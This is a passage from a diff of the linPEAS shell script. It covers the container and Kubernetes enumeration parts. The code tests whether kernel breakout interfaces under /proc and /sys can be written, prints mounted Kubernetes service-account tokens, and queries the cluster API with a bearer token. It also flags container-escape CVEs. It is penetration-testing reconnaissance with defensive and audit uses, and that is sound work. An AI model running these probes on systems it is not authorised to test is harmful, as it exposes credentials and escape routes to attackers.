  binfmt_misc_breakout="$( (echo -n '' > /proc/sys/fs/binfmt_misc/register && echo Yes) 2>/dev/null || echo No)"
  proc_configgz_readable="$([ -r '/proc/config.gz' ] 2>/dev/null && echo Yes || echo No)"
  sysreq_trigger_dos="$( (echo -n '' > /proc/sysrq-trigger && echo Yes) 2>/dev/null || echo No)"
  kmsg_readable="$( (dmesg > /dev/null 2>&1 && echo Yes) 2>/dev/null || echo No)"  # Kernel Exploit Dev
  kallsyms_readable="$( (head -n 1 /proc/kallsyms > /dev/null && echo Yes )2>/dev/null || echo No)" # Kernel Exploit Dev
  mem_readable="$( (head -n 1 /proc/self/mem > /dev/null && echo Yes) 2>/dev/null || echo No)"
  if [ "$(head -n 1 /tmp/kcore 2>/dev/null)" ]; then kcore_readable="Yes"; else kcore_readable="No"; fi
  kmem_readable="$( (head -n 1 /proc/kmem > /dev/null && echo Yes) 2>/dev/null || echo No)"
  kmem_writable="$( (echo -n '' > /proc/kmem > /dev/null && echo Yes) 2>/dev/null || echo No)"
  mem_readable="$( (head -n 1 /proc/mem > /dev/null && echo Yes) 2>/dev/null || echo No)"
  mem_writable="$( (echo -n '' > /proc/mem > /dev/null && echo Yes) 2>/dev/null || echo No)"
  sched_debug_readable="$( (head -n 1 /proc/sched_debug > /dev/null && echo Yes) 2>/dev/null || echo No)"
  mountinfo_readable="$( (head -n 1 /proc/*/mountinfo > /dev/null && echo Yes) 2>/dev/null || echo No)"
  uevent_helper_breakout="$( (echo -n '' > /sys/kernel/uevent_helper && echo Yes) 2>/dev/null || echo No)"
  vmcoreinfo_readable="$( (head -n 1 /sys/kernel/vmcoreinfo > /dev/null && echo Yes) 2>/dev/null || echo No)"
  security_present="$( (ls -l /sys/kernel/security > /dev/null && echo Yes) 2>/dev/null || echo No)"
  security_writable="$( (echo -n '' > /sys/kernel/security/a && echo Yes) 2>/dev/null || echo No)"
  efi_vars_writable="$( (echo -n '' > /sys/firmware/efi/vars && echo Yes) 2>/dev/null || echo No)"
  efi_efivars_writable="$( (echo -n '' > /sys/firmware/efi/efivars && echo Yes) 2>/dev/null || echo No)"
 }
 ##############################################
 #---------------) Containers (---------------#
 ##############################################
 containerCheck
 print_2title "Container related tools present (if any):"
 command -v docker 
 command -v lxc 
 command -v rkt 
 command -v kubectl
 command -v podman
 command -v runc
 if [ "$$FAT_LINPEAS_AMICONTAINED" ]; then
  print_2title "Am I Containered?"
  execBin "AmIContainered" "https://github.com/genuinetools/amicontained" "$FAT_LINPEAS_AMICONTAINED"
 fi
 print_2title "Container details"
 print_list "Is this a container? ...........$NC $containerType"
 print_list "Any running containers? ........ "$NC
 # Get counts of running containers for each platform
 dockercontainers=$(docker ps --format "{{.Names}}" 2>/dev/null | wc -l)
 podmancontainers=$(podman ps --format "{{.Names}}" 2>/dev/null | wc -l)
 lxccontainers=$(lxc list -c n --format csv 2>/dev/null | wc -l)
 rktcontainers=$(rkt list 2>/dev/null | tail -n +2  | wc -l)
 if [ "$dockercontainers" -eq "0" ] && [ "$lxccontainers" -eq "0" ] && [ "$rktcontainers" -eq "0" ] && [ "$podmancontainers" -eq "0" ]; then
    echo_no
 else
    containerCounts=""
    if [ "$dockercontainers" -ne "0" ]; then containerCounts="${containerCounts}docker($dockercontainers) "; fi
    if [ "$podmancontainers" -ne "0" ]; then containerCounts="${containerCounts}podman($podmancontainers) "; fi
    if [ "$lxccontainers" -ne "0" ]; then containerCounts="${containerCounts}lxc($lxccontainers) "; fi
    if [ "$rktcontainers" -ne "0" ]; then containerCounts="${containerCounts}rkt($rktcontainers) "; fi
    echo "Yes $containerCounts" | sed -${E} "s,.*,${SED_RED},"
    # List any running containers
    if [ "$dockercontainers" -ne "0" ]; then echo "Running Docker Containers" | sed -${E} "s,.*,${SED_RED},"; docker ps | tail -n +2 2>/dev/null; echo ""; fi
    if [ "$podmancontainers" -ne "0" ]; then echo "Running Podman Containers" | sed -${E} "s,.*,${SED_RED},"; podman ps | tail -n +2 2>/dev/null; echo ""; fi
    if [ "$lxccontainers" -ne "0" ]; then echo "Running LXC Containers" | sed -${E} "s,.*,${SED_RED},"; lxc list 2>/dev/null; echo ""; fi
    if [ "$rktcontainers" -ne "0" ]; then echo "Running RKT Containers" | sed -${E} "s,.*,${SED_RED},"; rkt list 2>/dev/null; echo ""; fi
 fi
 #If docker
 if echo "$containerType" | grep -qi "docker"; then
    print_2title "Docker Container details"
    inDockerGroup
    print_list "Am I inside Docker group .......$NC $DOCKER_GROUP\n" | sed -${E} "s,Yes,${SED_RED_YELLOW},"
    print_list "Looking and enumerating Docker Sockets (if any):\n"$NC
    enumerateDockerSockets
    print_list "Docker version .................$NC$dockerVersion"
    checkDockerVersionExploits
    print_list "Vulnerable to CVE-2019-5736 ....$NC$VULN_CVE_2019_5736"$NC | sed -${E} "s,Yes,${SED_RED_YELLOW},"
    print_list "Vulnerable to CVE-2019-13139 ...$NC$VULN_CVE_2019_13139"$NC | sed -${E} "s,Yes,${SED_RED_YELLOW},"
    if [ "$inContainer" ]; then
        checkDockerRootless
        print_list "Rootless Docker? ............... $DOCKER_ROOTLESS\n"$NC | sed -${E} "s,No,${SED_RED}," | sed -${E} "s,Yes,${SED_GREEN},"
        echo ""
    fi
    if df -h | grep docker; then
        print_2title "Docker Overlays"
        df -h | grep docker
    fi
 fi
 #If token secrets mounted
 if [ "$(mount | sed -n '/secret/ s/^tmpfs on \(.*default.*\) type tmpfs.*$/\1\/namespace/p')" ]; then
  print_2title "Listing mounted tokens"
  print_info "https://book.hacktricks.xyz/cloud-security/pentesting-kubernetes/attacking-kubernetes-from-inside-a-pod"
  ALREADY="IinItialVaaluE"
  for i in $(mount | sed -n '/secret/ s/^tmpfs on \(.*default.*\) type tmpfs.*$/\1\/namespace/p'); do
      TOKEN=$(cat $(echo $i | sed 's/.namespace$/\/token/'))
      if ! [ $(echo $TOKEN | grep -E $ALREADY) ]; then
          ALREADY="$ALREADY|$TOKEN"
          echo "Directory: $i"
          echo "Namespace: $(cat $i)"
          echo ""
          echo $TOKEN
          echo "================================================================================"
          echo ""
      fi
  done
 fi
 if [ "$inContainer" ]; then
    echo ""
    print_2title "Container & breakout enumeration"
    print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation/docker-breakout"
    print_list "Container ID ...................$NC $(cat /etc/hostname && echo -n '\n')"
    if [ -f "/proc/1/cpuset" ] && echo "$containerType" | grep -qi "docker"; then
        print_list "Container Full ID ..............$NC $(basename $(cat /proc/1/cpuset))\n"
    fi
    print_list "Seccomp enabled? ............... "$NC
    ([ "$(grep Seccomp /proc/self/status | grep -v 0)" ] && echo "enabled" || echo "disabled") | sed "s,disabled,${SED_RED}," | sed "s,enabled,${SED_GREEN},"
    print_list "AppArmor profile? .............. "$NC
    (cat /proc/self/attr/current 2>/dev/null || echo "disabled") | sed "s,disabled,${SED_RED}," | sed "s,kernel,${SED_GREEN},"
    print_list "User proc namespace? ........... "$NC
    if [ "$(cat /proc/self/uid_map 2>/dev/null)" ]; then (printf "enabled"; cat /proc/self/uid_map) | sed "s,enabled,${SED_GREEN},"; else echo "disabled" | sed "s,disabled,${SED_RED},"; fi
    checkContainerExploits
    print_list "Vulnerable to CVE-2019-5021 .... $VULN_CVE_2019_5021\n"$NC | sed -${E} "s,Yes,${SED_RED_YELLOW},"
    print_3title "Breakout via mounts"
    print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation/docker-breakout/docker-breakout-privilege-escalation/sensitive-mounts"
    checkProcSysBreakouts
    print_list "/proc mounted? ................. $proc_mounted\n" | sed -${E} "s,Yes,${SED_RED_YELLOW},"
    print_list "/dev mounted? .................. $dev_mounted\n" | sed -${E} "s,Yes,${SED_RED_YELLOW},"
    print_list "Run ushare ..................... $run_unshare\n" | sed -${E} "s,Yes,${SED_RED},"
    print_list "release_agent breakout 1........ $release_agent_breakout1\n" | sed -${E} "s,Yes,${SED_RED},"
    print_list "release_agent breakout 2........ $release_agent_breakout2\n" | sed -${E} "s,Yes,${SED_RED_YELLOW},"
    print_list "core_pattern breakout .......... $core_pattern_breakout\n" | sed -${E} "s,Yes,${SED_RED_YELLOW},"
    print_list "binfmt_misc breakout ........... $binfmt_misc_breakout\n" | sed -${E} "s,Yes,${SED_RED_YELLOW},"
    print_list "uevent_helper breakout ......... $uevent_helper_breakout\n" | sed -${E} "s,Yes,${SED_RED_YELLOW},"
    print_list "is modprobe present ............ $modprobe_present\n" | sed -${E} "s,/.*,${SED_RED},"
    print_list "DoS via panic_on_oom ........... $panic_on_oom_dos\n" | sed -${E} "s,Yes,${SED_RED},"
    print_list "DoS via panic_sys_fs ........... $panic_sys_fs_dos\n" | sed -${E} "s,Yes,${SED_RED},"
    print_list "DoS via sysreq_trigger_dos ..... $sysreq_trigger_dos\n" | sed -${E} "s,Yes,${SED_RED},"
    print_list "/proc/config.gz readable ....... $proc_configgz_readable\n" | sed -${E} "s,Yes,${SED_RED},"
    print_list "/proc/sched_debug readable ..... $sched_debug_readable\n" | sed -${E} "s,Yes,${SED_RED},"
    print_list "/proc/*/mountinfo readable ..... $mountinfo_readable\n" | sed -${E} "s,Yes,${SED_RED},"
    print_list "/sys/kernel/security present ... $security_present\n" | sed -${E} "s,Yes,${SED_RED},"
    print_list "/sys/kernel/security writable .. $security_writable\n" | sed -${E} "s,Yes,${SED_RED},"
    if [ "$EXTRA_CHECKS" ]; then
      print_list "/proc/kmsg readable ............ $kmsg_readable\n" | sed -${E} "s,Yes,${SED_RED},"
      print_list "/proc/kallsyms readable ........ $kallsyms_readable\n" | sed -${E} "s,Yes,${SED_RED},"
      print_list "/proc/self/mem readable ........ $sched_debug_readable\n" | sed -${E} "s,Yes,${SED_RED},"
      print_list "/proc/kcore readable ........... $kcore_readable\n" | sed -${E} "s,Yes,${SED_RED},"
      print_list "/proc/kmem readable ............ $kmem_readable\n" | sed -${E} "s,Yes,${SED_RED},"
      print_list "/proc/kmem writable ............ $kmem_writable\n" | sed -${E} "s,Yes,${SED_RED},"
      print_list "/proc/mem readable ............. $mem_readable\n" | sed -${E} "s,Yes,${SED_RED},"
      print_list "/proc/mem writable ............. $mem_writable\n" | sed -${E} "s,Yes,${SED_RED},"
      print_list "/sys/kernel/vmcoreinfo readable  $vmcoreinfo_readable\n" | sed -${E} "s,Yes,${SED_RED},"
      print_list "/sys/firmware/efi/vars writable  $efi_vars_writable\n" | sed -${E} "s,Yes,${SED_RED},"
      print_list "/sys/firmware/efi/efivars writable $efi_efivars_writable\n" | sed -${E} "s,Yes,${SED_RED},"
    fi
    echo ""
    print_3title "Namespaces"
    print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation/docker-breakout/namespaces"
    ls -l /proc/self/ns/
    if echo "$containerType" | grep -qi "kubernetes"; then
        print_list "Kubernetes namespace ...........$NC $(cat /run/secrets/kubernetes.io/serviceaccount/namespace /var/run/secrets/kubernetes.io/serviceaccount/namespace /secrets/kubernetes.io/serviceaccount/namespace 2>/dev/null)\n"
        print_list "Kubernetes token ...............$NC $(cat /run/secrets/kubernetes.io/serviceaccount/token /var/run/secrets/kubernetes.io/serviceaccount/token /secrets/kubernetes.io/serviceaccount/token 2>/dev/null)\n"
        echo ""
        print_2title "Kubernetes Information"
        print_info "https://book.hacktricks.xyz/cloud-security/pentesting-kubernetes/attacking-kubernetes-from-inside-a-pod"
        print_3title "Kubernetes service account folder"
        ls -lR /run/secrets/kubernetes.io/ /var/run/secrets/kubernetes.io/ /secrets/kubernetes.io/ 2>/dev/null
        echo ""
        print_3title "Kubernetes env vars"
        (env | set) | grep -Ei "kubernetes|kube" | grep -Ev "^WF=|^Wfolders=|^mounted=|^USEFUL_SOFTWARE='|^INT_HIDDEN_FILES=|^containerType="
        echo ""
        print_3title "Current sa user k8s permissions"
        print_info "https://book.hacktricks.xyz/cloud-security/pentesting-kubernetes/hardening-roles-clusterroles"
        kubectl auth can-i --list 2>/dev/null || curl -s -k -d "$(echo \"eyJraW5kIjoiU2VsZlN1YmplY3RSdWxlc1JldmlldyIsImFwaVZlcnNpb24iOiJhdXRob3JpemF0aW9uLms4cy5pby92MSIsIm1ldGFkYXRhIjp7ImNyZWF0aW9uVGltZXN0YW1wIjpudWxsfSwic3BlYyI6eyJuYW1lc3BhY2UiOiJlZXZlZSJ9LCJzdGF0dXMiOnsicmVzb3VyY2VSdWxlcyI6bnVsbCwibm9uUmVzb3VyY2VSdWxlcyI6bnVsbCwiaW5jb21wbGV0ZSI6ZmFsc2V9fQo=\"|base64 -d)" \
          "https://${KUBERNETES_SERVICE_HOST}:${KUBERNETES_SERVICE_PORT_HTTPS}/apis/authorization.k8s.io/v1/selfsubjectrulesreviews" \
            -X 'POST' -H 'Content-Type: application/json' \
            --header "Authorization: Bearer $(cat /var/run/secrets/kubernetes.io/serviceaccount/token)" | sed "s,secrets|exec|create|patch|impersonate|\"*\",${SED_RED},"
    fi
    echo ""
    print_2title "Container Capabilities"
    print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation/docker-breakout/docker-breakout-privilege-escalation#capabilities-abuse-escape"
    if [ "$(command -v capsh)" ]; then 
      capsh --print 2>/dev/null | sed -${E} "s,$containercapsB,${SED_RED},g"
    else
      defautl_docker_caps="00000000a80425fb=cap_chown,cap_dac_override,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_net_bind_service,cap_net_raw,cap_sys_chroot,cap_mknod,cap_audit_write,cap_setfcap"
      cat /proc/self/status | tr '\t' ' ' | grep Cap | sed -${E} "s, .*,${SED_RED},g" | sed -${E} "s/00000000a80425fb/$defautl_docker_caps/g" | sed -${E} "s,0000000000000000|00000000a80425fb,${SED_GREEN},g"
      echo $ITALIC"Run capsh --decode=<hex> to decode the capabilities"$NC
    fi
    echo ""
    print_2title "Privilege Mode"
    if [ -x "$(command -v fdisk)" ]; then
        if [ "$(fdisk -l 2>/dev/null | wc -l)" -gt 0 ]; then
            echo "Privilege Mode is enabled"| sed -${E} "s,enabled,${SED_RED_YELLOW},"
        else
            echo "Privilege Mode is disabled"| sed -${E} "s,disabled,${SED_GREEN},"
        fi
    else
        echo_not_found
    fi
    echo ""
    print_2title "Interesting Files Mounted"
    (mount -l || cat /proc/self/mountinfo || cat /proc/1/mountinfo || cat /proc/mounts || cat /proc/self/mounts || cat /proc/1/mounts )2>/dev/null | grep -Ev "$GREP_IGNORE_MOUNTS" | sed -${E} "s,.sock,${SED_RED}," | sed -${E} "s,docker.sock,${SED_RED_YELLOW}," | sed -${E} "s,/dev/,${SED_RED},g"
    echo ""
    print_2title "Possible Entrypoints"
    ls -lah /*.sh /*entrypoint* /**/entrypoint* /**/*.sh /deploy* 2>/dev/null | sort | uniq
    echo ""
 fi
--- a/linPEAS/builder/linpeas_parts/2_container/1_Container_tools.sh
+++ b/linPEAS/builder/linpeas_parts/2_container/1_Container_tools.sh
@ -0,0 +1,73 @@
 # Title: Container - Container Tools
 # ID: CT_Container_tools
 # Author: Carlos Polop
 # Last Update: 07-03-2024
 # Description: Find container related tools in the PATH of the system that could be used for container escape:
 #   - Container runtime tools
 #   - Container management tools
 #   - Container networking tools
 #   - Common vulnerable scenarios:
 #     * Misconfigured container tools
 #     * Privileged container tools
 #     * Container escape tools
 #   - Exploitation methods:
 #     * Tool abuse: Exploit container tool misconfigurations
 #     * Common attack vectors:
 #       - Runtime escape
 #       - Privilege escalation
 #       - Container breakout
 #     * Exploit techniques:
 #       - Tool misconfiguration abuse
 #       - Privileged tool exploitation
 #       - Container escape tool usage
 # License: GNU GPL
 # Version: 1.0
 # Functions Used: print_2title
 # Global Variables:
 # Initial Functions:
 # Generated Global Variables:
 # Fat linpeas: 0
 # Small linpeas: 1
 print_2title "Container related tools present (if any):"
 # Container runtimes
 command -v docker
 command -v lxc
 command -v rkt
 command -v podman
 command -v runc
 command -v ctr
 command -v containerd
 command -v crio
 command -v nerdctl
 # Container management
 command -v kubectl
 command -v crictl
 command -v docker-compose
 command -v docker-machine
 command -v minikube
 command -v kind
 # Container networking
 command -v docker-proxy
 command -v cni
 command -v flanneld
 command -v calicoctl
 # Container security
 command -v apparmor_parser
 command -v seccomp
 command -v gvisor
 command -v kata-runtime
 # Container debugging
 command -v nsenter
 command -v unshare
 command -v chroot
 command -v capsh
 command -v setcap
 command -v getcap
 echo ""
--- a/linPEAS/builder/linpeas_parts/2_container/2_List_mounted_tokens.sh
+++ b/linPEAS/builder/linpeas_parts/2_container/2_List_mounted_tokens.sh
@ -0,0 +1,33 @@
 # Title: Container - List mounted tokens
 # ID: CT_List_mounted_tokens
 # Author: Carlos Polop
 # Last Update: 22-08-2023
 # Description: List tokens mounted in the system if any
 # License: GNU GPL
 # Version: 1.0
 # Functions Used: print_2title, print_info
 # Global Variables:
 # Initial Functions:
 # Generated Global Variables: $ALREADY_TOKENS, $TEMP_TOKEN
 # Fat linpeas: 0
 # Small linpeas: 1
 if [ "$(mount | sed -n '/secret/ s/^tmpfs on \(.*default.*\) type tmpfs.*$/\1\/namespace/p')" ]; then
  print_2title "Listing mounted tokens"
  print_info "https://cloud.hacktricks.wiki/en/pentesting-cloud/kubernetes-security/attacking-kubernetes-from-inside-a-pod.html"
  ALREADY_TOKENS="IinItialVaaluE"
  for i in $(mount | sed -n '/secret/ s/^tmpfs on \(.*default.*\) type tmpfs.*$/\1\/namespace/p'); do
      TEMP_TOKEN=$(cat $(echo $i | sed 's/.namespace$/\/token/'))
      if ! [ $(echo $TEMP_TOKEN | grep -E $ALREADY_TOKENS) ]; then
          ALREADY_TOKENS="$ALREADY_TOKENS|$TEMP_TOKEN"
          echo "Directory: $i"
          echo "Namespace: $(cat $i)"
          echo ""
          echo $TEMP_TOKEN
          echo "================================================================================"
          echo ""
      fi
  done
 fi
--- a/linPEAS/builder/linpeas_parts/2_container/3_Container_details.sh
+++ b/linPEAS/builder/linpeas_parts/2_container/3_Container_details.sh
@ -0,0 +1,109 @@
 # Title: Container - Container details
 # ID: CT_Container_details
 # Author: Carlos Polop
 # Last Update: 07-03-2024
 # Description: Get detailed container information relevant to privilege escalation:
 #   - Container type and runtime
 #   - Running containers
 #   - Container configuration
 #   - Common vulnerable scenarios:
 #     * Misconfigured containers
 #     * Privileged containers
 #     * Exposed container APIs
 #     * Container networking
 #   - Exploitation methods:
 #     * Container breakout: Exploit container misconfigurations
 #     * Common attack vectors:
 #       - Runtime escape
 #       - Privilege escalation
 #       - Container breakout
 #       - Network escape
 #     * Exploit techniques:
 #       - Container misconfiguration abuse
 #       - Privileged container exploitation
 #       - Container API abuse
 #       - Network escape techniques
 # License: GNU GPL
 # Version: 1.0
 # Functions Used: containerCheck, echo_no, print_2title, print_list, warn_exec
 # Global Variables: $containerType
 # Initial Functions: containerCheck
 # Generated Global Variables: $dockercontainers, $podmancontainers, $lxccontainers, $rktcontainers, $containerCounts
 # Fat linpeas: 0
 # Small linpeas: 1
 print_2title "Container details"
 print_list "Is this a container? ...........$NC $containerType"
 # Get container runtime info
 if [ "$(command -v docker || echo -n '')" ]; then
    print_list "Docker version ...............$NC "
    warn_exec docker version
    print_list "Docker info .................$NC "
    warn_exec docker info
 fi
 if [ "$(command -v podman || echo -n '')" ]; then
    print_list "Podman version ..............$NC "
    warn_exec podman version
    print_list "Podman info ................$NC "
    warn_exec podman info
 fi
 if [ "$(command -v lxc || echo -n '')" ]; then
    print_list "LXC version ................$NC "
    warn_exec lxc version
    print_list "LXC info ...................$NC "
    warn_exec lxc info
 fi
 print_list "Any running containers? ........ "$NC
 # Get counts of running containers for each platform
 dockercontainers=$(docker ps --format "{{.Names}}" 2>/dev/null | wc -l)
 podmancontainers=$(podman ps --format "{{.Names}}" 2>/dev/null | wc -l)
 lxccontainers=$(lxc list -c n --format csv 2>/dev/null | wc -l)
 rktcontainers=$(rkt list 2>/dev/null | tail -n +2  | wc -l)
 if [ "$dockercontainers" -eq "0" ] && [ "$lxccontainers" -eq "0" ] && [ "$rktcontainers" -eq "0" ] && [ "$podmancontainers" -eq "0" ]; then
    echo_no
 else
    containerCounts=""
    if [ "$dockercontainers" -ne "0" ]; then containerCounts="${containerCounts}docker($dockercontainers) "; fi
    if [ "$podmancontainers" -ne "0" ]; then containerCounts="${containerCounts}podman($podmancontainers) "; fi
    if [ "$lxccontainers" -ne "0" ]; then containerCounts="${containerCounts}lxc($lxccontainers) "; fi
    if [ "$rktcontainers" -ne "0" ]; then containerCounts="${containerCounts}rkt($rktcontainers) "; fi
    echo "Yes $containerCounts" | sed -${E} "s,.*,${SED_RED},"
    # List any running containers with more details
    if [ "$dockercontainers" -ne "0" ]; then 
        echo "Running Docker Containers" | sed -${E} "s,.*,${SED_RED},"
        docker ps -a 2>/dev/null
        #echo "Docker Container Details" | sed -${E} "s,.*,${SED_RED},"
        #docker inspect $(docker ps -q) 2>/dev/null | grep -E "Privileged|CapAdd|CapDrop|SecurityOpt|HostConfig" | sed -${E} "s,true|privileged|host,${SED_RED},g"
        echo ""
    fi
    if [ "$podmancontainers" -ne "0" ]; then 
        echo "Running Podman Containers" | sed -${E} "s,.*,${SED_RED},"
        podman ps -a 2>/dev/null
        #echo "Podman Container Details" | sed -${E} "s,.*,${SED_RED},"
        #podman inspect $(podman ps -q) 2>/dev/null | grep -E "Privileged|CapAdd|CapDrop|SecurityOpt|HostConfig" | sed -${E} "s,true|privileged|host,${SED_RED},g"
        echo ""
    fi
    if [ "$lxccontainers" -ne "0" ]; then 
        echo "Running LXC Containers" | sed -${E} "s,.*,${SED_RED},"
        lxc list 2>/dev/null
        #echo "LXC Container Details" | sed -${E} "s,.*,${SED_RED},"
        #lxc config show $(lxc list -c n --format csv) 2>/dev/null | grep -E "security.privileged|security.capabilities|security.syscalls" | sed -${E} "s,true|privileged|host,${SED_RED},g"
        echo ""
    fi
    if [ "$rktcontainers" -ne "0" ]; then 
        echo "Running RKT Containers" | sed -${E} "s,.*,${SED_RED},"
        rkt list 2>/dev/null
        #echo "RKT Container Details" | sed -${E} "s,.*,${SED_RED},"
        #rkt status $(rkt list --format=json 2>/dev/null | jq -r '.[].id') 2>/dev/null | grep -E "privileged|capabilities|security" | sed -${E} "s,true|privileged|host,${SED_RED},g"
        echo ""
    fi
 fi
 echo ""
--- a/linPEAS/builder/linpeas_parts/2_container/4_Docker_container_details.sh
+++ b/linPEAS/builder/linpeas_parts/2_container/4_Docker_container_details.sh
@ -0,0 +1,37 @@
 # Title: Container - Docker Container details
 # ID: CT_Docker_container_details
 # Author: Carlos Polop
 # Last Update: 22-08-2023
 # Description: Get docker Container details from the inside
 # License: GNU GPL
 # Version: 1.0
 # Functions Used: checkDockerRootless, checkDockerVersionExploits, containerCheck, enumerateDockerSockets, inDockerGroup, print_2title, print_list
 # Global Variables: $containerType, $DOCKER_GROUP, $DOCKER_ROOTLESS, $dockerVersion, $inContainer, $VULN_CVE_2019_5736, $VULN_CVE_2019_13139, $VULN_CVE_2021_41091
 # Initial Functions: containerCheck
 # Generated Global Variables:
 # Fat linpeas: 0
 # Small linpeas: 1
 #If docker
 if echo "$containerType" | grep -qi "docker"; then
    print_2title "Docker Container details"
    inDockerGroup
    print_list "Am I inside Docker group .......$NC $DOCKER_GROUP\n" | sed -${E} "s,Yes,${SED_RED_YELLOW},"
    print_list "Looking and enumerating Docker Sockets (if any):\n"$NC
    enumerateDockerSockets
    print_list "Docker version .................$NC$dockerVersion"
    checkDockerVersionExploits
    print_list "Vulnerable to CVE-2019-5736 ....$NC$VULN_CVE_2019_5736"$NC | sed -${E} "s,Yes,${SED_RED_YELLOW},"
    print_list "Vulnerable to CVE-2019-13139 ...$NC$VULN_CVE_2019_13139"$NC | sed -${E} "s,Yes,${SED_RED_YELLOW},"
    print_list "Vulnerable to CVE-2021-41091 ...$NC$VULN_CVE_2021_41091"$NC | sed -${E} "s,Yes,${SED_RED_YELLOW},"
    if [ "$inContainer" ]; then
        checkDockerRootless
        print_list "Rootless Docker? ............... $DOCKER_ROOTLESS\n"$NC | sed -${E} "s,No,${SED_RED}," | sed -${E} "s,Yes,${SED_GREEN},"
        echo ""
    fi
    if df -h | grep docker; then
        print_2title "Docker Overlays"
        df -h | grep docker
    fi
 fi
--- a/linPEAS/builder/linpeas_parts/2_container/5_Container_breakout.sh
+++ b/linPEAS/builder/linpeas_parts/2_container/5_Container_breakout.sh
@ -0,0 +1,293 @@
 # Title: Container - Container & breakout enumeration
 # ID: CT_Container_breakout
 # Author: Carlos Polop
 # Last Update: 07-03-2024
 # Description: Container breakout enumeration to identify potential escape vectors:
 #   - Container runtime vulnerabilities
 #   - Mount point misconfigurations
 #   - Capability abuse
 #   - Namespace escape
 #   - Common vulnerable scenarios:
 #     * Privileged containers
 #     * Misconfigured mounts
 #     * Excessive capabilities
 #     * Namespace isolation bypass
 #     * Runtime vulnerabilities
 #     * Container escape tools
 #     * Shared kernel exploits
 #     * Container escape CVEs
 #   - Exploitation methods:
 #     * Mount escape: Abuse mount misconfigurations
 #     * Capability abuse: Exploit excessive capabilities
 #     * Namespace escape: Break out of container namespaces
 #     * Runtime escape: Exploit container runtime vulnerabilities
 #     * Common attack vectors:
 #       - Mount point manipulation
 #       - Capability exploitation
 #       - Namespace breakout
 #       - Runtime vulnerability abuse
 #       - Kernel exploit abuse
 #       - Container escape tool usage
 #     * Exploit techniques:
 #       - Mount point abuse
 #       - Capability escalation
 #       - Namespace escape
 #       - Runtime exploitation
 #       - Kernel exploitation
 #       - Container escape tool execution
 # License: GNU GPL
 # Version: 1.0
 # Functions Used: checkContainerExploits, checkProcSysBreakouts, containerCheck, print_2title, print_3title, print_info, print_list, warn_exec
 # Global Variables: $binfmt_misc_breakout, $containercapsB, $containerType, $core_pattern_breakout, $dev_mounted, $efi_efivars_writable, $efi_vars_writable, $GREP_IGNORE_MOUNTS, $inContainer, $kallsyms_readable, $kcore_readable, $kmem_readable, $kmem_writable, $kmsg_readable, $mem_readable, $mem_writable, $modprobe_present, $mountinfo_readable, $panic_on_oom_dos, $panic_sys_fs_dos, $proc_configgz_readable, $proc_mounted, $run_unshare, $release_agent_breakout1, $release_agent_breakout2, $release_agent_breakout3, $sched_debug_readable, $security_present, $security_writable, $sysreq_trigger_dos, $uevent_helper_breakout, $vmcoreinfo_readable, $VULN_CVE_2019_5021, $self_mem_readable
 # Initial Functions: containerCheck
 # Generated Global Variables: $defautl_docker_caps, $containerd_version, $runc_version, $containerd_version
 # Fat linpeas: 0
 # Small linpeas: 0
 if [ "$inContainer" ]; then
    echo ""
    print_2title "Container & breakout enumeration"
    print_info "https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation/index.html"
    # Basic container info
    print_list "Container ID ...................$NC $(cat /etc/hostname && echo -n '\n')"
    if [ -f "/proc/1/cpuset" ] && echo "$containerType" | grep -qi "docker"; then
        print_list "Container Full ID ..............$NC $(basename $(cat /proc/1/cpuset))\n"
    fi
    # Security mechanisms
    print_3title "Security Mechanisms"
    print_list "Seccomp enabled? ............... "$NC
    ([ "$(grep Seccomp /proc/self/status | grep -v 0)" ] && echo "enabled" || echo "disabled") | sed "s,disabled,${SED_RED}," | sed "s,enabled,${SED_GREEN},"
    print_list "AppArmor profile? .............. "$NC
    (cat /proc/self/attr/current 2>/dev/null || echo "disabled") | sed "s,disabled,${SED_RED}," | sed "s,kernel,${SED_GREEN},"
    print_list "User proc namespace? ........... "$NC
    if [ "$(cat /proc/self/uid_map 2>/dev/null)" ]; then (printf "enabled"; cat /proc/self/uid_map) | sed "s,enabled,${SED_GREEN},"; else echo "disabled" | sed "s,disabled,${SED_RED},"; fi
    # Known vulnerabilities
    print_3title "Known Vulnerabilities"
    checkContainerExploits
    print_list "Vulnerable to CVE-2019-5021 .... $VULN_CVE_2019_5021\n"$NC | sed -${E} "s,Yes,${SED_RED_YELLOW},"
    # Check for container escape tools
    print_list "Container escape tools present .. "$NC
    (command -v nsenter || command -v unshare || command -v chroot || command -v capsh || command -v setcap || command -v getcap || command -v docker || command -v kubectl || command -v ctr || command -v runc || command -v containerd || command -v crio || command -v podman || command -v lxc || command -v rkt || command -v nerdctl || echo "No") | sed -${E} "s,nsenter|unshare|chroot|capsh|setcap|getcap|docker|kubectl|ctr|runc|containerd|crio|podman|lxc|rkt|nerdctl,${SED_RED},g"
    # Runtime vulnerabilities
    print_3title "Runtime Vulnerabilities"
    # Check for known runtime vulnerabilities
    if [ "$(command -v runc || echo -n '')" ]; then
        print_list "Runc version ................. "$NC
        warn_exec runc --version
        # Check for specific runc vulnerabilities
        runc_version=$(runc --version 2>/dev/null | grep -i "version" | grep -Eo "[0-9]+\.[0-9]+\.[0-9]+")
        if [ "$runc_version" ]; then
            print_list "Runc CVE-2019-5736 ........... "$NC
            if [ "$(echo $runc_version | awk -F. '{ if ($1 < 1 || ($1 == 1 && $2 < 0) || ($1 == 1 && $2 == 0 && $3 < 7)) print "Yes"; else print "No"; }')" = "Yes" ]; then
                echo "Yes - Vulnerable" | sed -${E} "s,Yes,${SED_RED},"
            else
                echo "No"
            fi
        fi
    fi
    if [ "$(command -v containerd || echo -n '')" ]; then
        print_list "Containerd version ........... "$NC
        warn_exec containerd --version
        # Check for specific containerd vulnerabilities
        containerd_version=$(containerd --version 2>/dev/null | grep -Eo "[0-9]+\.[0-9]+\.[0-9]+")
        if [ "$containerd_version" ]; then
            print_list "Containerd CVE-2020-15257 ..... "$NC
            if [ "$(echo $containerd_version | awk -F. '{ if ($1 < 1 || ($1 == 1 && $2 < 4) || ($1 == 1 && $2 == 4 && $3 < 3)) print "Yes"; else print "No"; }')" = "Yes" ]; then
                echo "Yes - Vulnerable" | sed -${E} "s,Yes,${SED_RED},"
            else
                echo "No"
            fi
        fi
    fi
    # Mount escape vectors
    print_3title "Breakout via mounts"
